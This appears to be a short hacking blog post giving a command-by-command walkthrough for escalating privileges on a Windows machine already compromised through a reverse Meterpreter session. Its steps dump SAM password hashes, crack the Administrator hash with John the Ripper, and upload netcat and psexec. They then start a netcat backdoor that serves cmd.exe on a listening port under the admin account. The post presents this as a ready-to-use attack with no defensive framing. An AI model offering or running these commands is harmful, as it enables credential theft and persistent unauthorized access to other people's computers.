Privilege escalation


Steps:
------
(after connecting to remote computer with Payload of win32_reverse_meterpreter)
1) Load File system library, SAM library, and Process library
ex. use -m Fs use -m Sam use -m Process
2) Get the window's password hash file
ex. gethashes
(gethashes is part of the SAM library)
3) Crack the Admin's hash with John the ripper
ex. john /tmp/dump-01.txt
4) Upload Netcat, Psexec, and whoami. Netcat is a useful program to up a backdoor on a computer. Psexec can select what user to run a program under. Whoami just tells you what user you are logged in as.
ex. upload /tmp/nc.exe c: upload /tmp/psexec.exe c: upload /tmp/whoami.exe c:
5) Run a Netcat server under the Admin's account!
ex. psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969
6) Telnet into the Netcat server and you now have admin access!!!
ex. Telnet 192.168.0.6 6969
Enjoy please like subscribe and follow

Comments

Popular posts from this blog

Hacking with Kali linux ( Pdf download)

100th Post